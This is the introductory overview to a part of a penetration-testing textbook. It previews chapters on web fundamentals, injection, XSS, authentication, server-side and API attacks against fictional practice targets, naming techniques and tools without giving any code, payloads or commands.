Part 4: Exploitation -- Web and Application Attacks
"The web is where the money is, where the data is, and where the bugs are. It is the modern attack surface, and it is not getting smaller."
If you wanted to pick one domain of offensive security where demand is highest, where bugs are most plentiful, and where a skilled tester can have the most impact, this would be it. Web applications are the front door to nearly every organization on the planet. Behind every login page, every search bar, every API endpoint sits business logic, user data, and the kind of access that makes or breaks a penetration test.
Consider the numbers for a moment. The majority of bug bounty payouts go to web application vulnerabilities. The OWASP Top 10 has been the defining document in application security for over two decades, and the vulnerabilities it describes -- injection, broken authentication, cross-site scripting -- remain stubbornly, persistently exploitable despite being well understood. This is not because web developers are careless. It is because web applications are extraordinarily complex, the attack surface is vast, and the pace of development almost always outstrips the pace of security review.
In Part 3, we gained access to systems and escalated privileges at the operating system level. Part 4 shifts our focus to the application layer. You are going to learn how modern web applications work from an attacker's perspective, and then you are going to systematically dismantle their security controls. The ShopStack e-commerce application that we introduced in Chapter 2 becomes our primary target here, and by the end of this part, you will have extracted customer data, bypassed authentication, hijacked sessions, forged server-side requests, and exploited APIs in ways that demonstrate the real-world impact of application-level vulnerabilities.
What You Will Learn
Six chapters cover the application attack surface from fundamentals through advanced server-side exploitation and modern API security.
Chapter 18: Web Application Security Fundamentals ensures you understand the terrain before you start attacking it. We cover web application architecture in depth, walk through the OWASP Top 10, go deep on HTTP methods, headers, and status codes, and get you set up with Burp Suite -- the tool that will become your constant companion for the rest of this part. You will learn to map web applications systematically, intercept and modify requests, and understand input validation and output encoding at a level that lets you spot failures in the wild. This chapter transforms how you look at every website you visit.
Chapter 19: Injection Attacks addresses the vulnerability class that has topped the OWASP Top 10 for most of its existence. SQL injection is the centerpiece, and we cover it thoroughly -- UNION-based, blind, error-based, time-based, out-of-band, and second-order variants. But injection is not limited to SQL. You will learn NoSQL injection against MongoDB and similar databases, command injection that gives you OS-level access through a web application, and specialized injection types including LDAP, XPath, and server-side template injection. We cover manual exploitation in enough depth that you understand the mechanics, then introduce automated tools like sqlmap and Commix for efficient real-world testing. The ShopStack product search feature becomes our injection playground, and the progression from a simple search field to full database extraction demonstrates why input validation is the foundation of application security.
Chapter 20: Cross-Site Scripting and Client-Side Attacks moves to the client side. XSS remains one of the most common and most underestimated vulnerability classes. We cover reflected, stored, and DOM-based XSS, then demonstrate real exploitation -- cookie theft, keylogging, phishing overlays, and session hijacking. Advanced techniques including Content Security Policy bypass, mutation XSS, and polyglot payloads prepare you for modern, hardened applications. We also cover CSRF, clickjacking, and browser-based exploitation frameworks like BeEF. When we demonstrate a stored XSS attack on ShopStack's product review feature that captures administrator credentials, the difference between "low severity" scanner findings and actual impact becomes unmistakable.
Chapter 21: Authentication and Session Attacks targets the mechanisms that determine who you are and what you can access. We systematically break authentication systems -- from basic username/password forms through OAuth 2.0, OpenID Connect, JWT implementations, SAML, and multi-factor authentication. Session management vulnerabilities, including predictable session tokens, fixation, and insufficient expiration, are covered in detail. JWT attacks are a particular focus, covering the none algorithm vulnerability, key confusion attacks, and JKU injection. In MedSecure's patient portal, we demonstrate how a flawed OAuth implementation allows us to access any patient's medical records -- a finding that would have real regulatory consequences under HIPAA.
Chapter 22: Server-Side Attacks covers the vulnerability classes that often yield the highest impact. Server-Side Request Forgery allows you to make the server issue requests on your behalf, potentially reaching internal systems that are not exposed to the internet. XXE attacks exploit XML parsers to read files, perform SSRF, or achieve denial of service. Insecure deserialization can lead directly to remote code execution. Server-Side Template Injection turns template engines into code execution platforms. File upload vulnerabilities can place web shells on the server. And JNDI injection, exemplified by Log4Shell, demonstrates how a single vulnerability in a ubiquitous library can compromise millions of systems. These are the findings that make executive summaries.
Chapter 23: API Security Testing reflects the reality that modern applications are not monolithic web pages but collections of APIs. REST, GraphQL, and gRPC each present distinct attack surfaces. You will learn API reconnaissance and documentation discovery, Broken Object Level Authorization (BOLA/IDOR) attacks that let you access other users' data by manipulating identifiers, mass assignment vulnerabilities, rate limiting bypass, and business logic flaws that no automated scanner will ever find. The OWASP API Security Top 10 provides our framework. ShopStack's API -- which powers its mobile app, its partner integrations, and its single-page frontend -- is our primary target, and its vulnerabilities reflect exactly what you will find in production API deployments.
Key Themes
The web is a protocol, not a platform. Understanding HTTP at a deep level -- not just GET and POST, but the full spectrum of methods, headers, cookies, caching behaviors, and encoding schemes -- is what lets you see vulnerabilities that automated tools miss. We invest heavily in this understanding because it pays dividends in every chapter.
Input and output are everything. Nearly every web vulnerability comes down to the same fundamental failure: trusting user input or failing to properly encode output. Injection, XSS, SSRF, template injection, file upload -- they are all variations on the same theme. Once you internalize this, you start to see the pattern everywhere.
Business logic flaws are the highest-value targets. Automated scanners find the easy stuff. The findings that differentiate a skilled pentester -- the IDOR that exposes every customer's data, the race condition that lets you purchase items for free, the workflow bypass that skips the payment step entirely -- require understanding the application's business logic. These chapters teach you to think like a developer and then think like an attacker simultaneously.
APIs are the new perimeter. As organizations adopt microservices, mobile applications, and third-party integrations, the API surface grows far beyond what traditional web application testing covers. Chapter 23 is not an afterthought -- it reflects where the industry is heading and where many of the most impactful vulnerabilities now live.
How This Part Connects
Part 3 gave you the ability to compromise infrastructure -- operating systems, network services, Active Directory. Part 4 gives you the complementary ability to compromise applications. Together, these two parts cover the vast majority of what you will encounter in professional penetration testing engagements. Many real-world attack chains combine both: a web application vulnerability provides the initial foothold, and system-level techniques achieve privilege escalation and lateral movement. Or conversely, a compromised server reveals database credentials that expose the application layer.
Part 5 extends your capabilities further with post-exploitation techniques, wireless attacks, social engineering execution, evasion, and cryptographic attacks. The web application skills you build here are directly relevant -- WAF bypass in Chapter 27 builds on your understanding of injection and XSS, and the social engineering attacks in Chapter 26 often begin with a phishing page that leverages every web concept in this part.
Open Burp Suite. It is time to proxy some traffic.